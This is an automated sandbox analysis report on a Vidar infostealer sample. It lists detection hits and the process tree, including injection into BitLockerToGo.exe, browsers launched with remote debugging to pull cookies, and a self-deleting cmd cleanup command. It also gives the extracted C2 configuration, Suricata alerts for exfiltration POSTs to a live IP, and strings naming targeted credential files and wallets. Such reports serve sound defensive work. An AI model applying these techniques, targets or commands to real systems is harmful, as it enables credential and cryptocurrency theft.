Edit tour

Windows Analysis Report
updater.exe

Overview

General Information

Sample name:	updater.exe
Analysis ID:	1617052
MD5:	7ca1a467d3565e8827428ac7be5b7bf6
SHA1:	63a893bf674933c34cbe216b49722ad18d625fc6
SHA256:	efbd528c8ed8c5253b5e191eedc85e30f75778a417b5f427da115e7f44d9dd47
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Monitors registry run keys for changes

Performs DNS queries to domains with low reputation

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Creates a process in suspended mode (likely to inject code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Stores files to the Windows start menu directory

Uses 32bit PE files

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

updater.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\updater.exe" MD5: 7CA1A467D3565E8827428AC7BE5B7BF6)

BitLockerToGo.exe (PID: 6584 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

chrome.exe (PID: 3628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2312,i,2291169248669740386,7514103051101934735,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 7808 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8048 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2720 --field-trial-handle=2488,i,5951683665883633308,6049568498423703109,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7552 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2332,i,4956213852841536756,7730517169440128935,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 1468 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\vs268" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 3280 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

msedge.exe (PID: 8060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3372 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2056,i,5947646742752305411,13093796674475547670,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3148 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5544 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8036 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7032 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7844 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7176 --field-trial-handle=2024,i,13848322195618347934,3552849807574582560,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199825403037", "Botnet": "oomaino5"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.2454538216.000000000BE20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2454538216.000000000BE20000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1ad7f:$str01: MachineID: 0x19d4f:$str02: Work Dir: In memory 0x1ae27:$str03: [Hardware] 0x1ad68:$str04: VideoCard: 0x1a4c0:$str05: [Processes] 0x1a4cc:$str06: [Software] 0x19de0:$str07: information.txt 0x1aabc:$str08: %s\* 0x1ab09:$str08: %s\* 0x19ffd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1a392:$str12: UseMasterPassword 0x1ae33:$str13: Soft: WinSCP 0x1a86b:$str14: <Pass encoding="base64"> 0x1ae16:$str15: Soft: FileZilla 0x19dd2:$str16: passwords.txt 0x1a3bd:$str17: build_id 0x1a484:$str18: file_data
00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2454538216.000000000BE00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2454538216.000000000BE00000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
00000000.00000002.2454538216.000000000BE40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2454538216.000000000BE40000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19f7f:$str01: MachineID: 0x18f4f:$str02: Work Dir: In memory 0x1a027:$str03: [Hardware] 0x19f68:$str04: VideoCard: 0x196c0:$str05: [Processes] 0x196cc:$str06: [Software] 0x18fe0:$str07: information.txt 0x19cbc:$str08: %s\* 0x19d09:$str08: %s\* 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x19592:$str12: UseMasterPassword 0x1a033:$str13: Soft: WinSCP 0x19a6b:$str14: <Pass encoding="base64"> 0x1a016:$str15: Soft: FileZilla 0x18fd2:$str16: passwords.txt 0x195bd:$str17: build_id 0x19684:$str18: file_data
Process Memory Space: updater.exe PID: 5624	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 6584	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 6584	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 6584, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 3628, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:02:51.646044+0100	2044247	1	Malware Command and Control Activity Detected	116.202.2.159	443	192.168.2.5	49900	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:02:53.153921+0100	2051831	1	Malware Command and Control Activity Detected	116.202.2.159	443	192.168.2.5	49910	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:02:50.314117+0100	2049087	1	A Network Trojan was detected	192.168.2.5	49889	116.202.2.159	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:02:54.579132+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49921	116.202.2.159	443	TCP
2025-02-17T13:02:55.652575+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49927	116.202.2.159	443	TCP
2025-02-17T13:03:03.778149+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49995	116.202.2.159	443	TCP
2025-02-17T13:03:04.084376+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50006	116.202.2.159	443	TCP
2025-02-17T13:03:05.167471+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50011	116.202.2.159	443	TCP
2025-02-17T13:03:06.206324+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50012	116.202.2.159	443	TCP
2025-02-17T13:03:08.218764+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50013	116.202.2.159	443	TCP
2025-02-17T13:03:28.558292+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50057	116.202.2.159	443	TCP
2025-02-17T13:03:29.125728+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50073	116.202.2.159	443	TCP
2025-02-17T13:03:30.005909+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50088	116.202.2.159	443	TCP
2025-02-17T13:03:32.080567+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50117	116.202.2.159	443	TCP
2025-02-17T13:03:33.188273+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50121	116.202.2.159	443	TCP
2025-02-17T13:03:35.230814+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50124	116.202.2.159	443	TCP
2025-02-17T13:03:36.381748+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50126	116.202.2.159	443	TCP
2025-02-17T13:03:40.949748+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50135	116.202.2.159	443	TCP
2025-02-17T13:03:44.408535+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50137	116.202.2.159	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:03:04.084376+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50006	116.202.2.159	443	TCP
2025-02-17T13:03:05.167471+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50011	116.202.2.159	443	TCP
2025-02-17T13:03:06.206324+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50012	116.202.2.159	443	TCP
2025-02-17T13:03:29.125728+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50073	116.202.2.159	443	TCP
2025-02-17T13:03:30.005909+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50088	116.202.2.159	443	TCP
2025-02-17T13:03:32.080567+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50117	116.202.2.159	443	TCP
2025-02-17T13:03:33.188273+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50121	116.202.2.159	443	TCP
2025-02-17T13:03:35.230814+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50124	116.202.2.159	443	TCP
2025-02-17T13:03:36.381748+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50126	116.202.2.159	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:02:48.833797+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.5	49878	116.202.2.159	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: updater.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199825403037", "Botnet": "oomaino5"}

Multi AV Scanner detection for submitted file

Source: updater.exe	Virustotal: Detection: 75%			Perma Link
Source: updater.exe	ReversingLabs: Detection: 79%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: updater.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.2.159:443 -> 192.168.2.5:49871 version: TLS 1.2

Source: updater.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: updater.exe, 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: vdr1.pdb source: updater.exe, 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: updater.exe, 00000000.00000002.2454538216.000000000BEDC000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: updater.exe, 00000000.00000002.2454538216.000000000BEDC000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: updater.exe, 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 38MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49889 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49878 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49921 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49927 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49995 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.2.159:443 -> 192.168.2.5:49910
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50006 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50006 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50012 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50012 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50013 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.2.159:443 -> 192.168.2.5:49900
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50011 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50011 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50073 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50073 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50088 -> 116.202.2.159:443
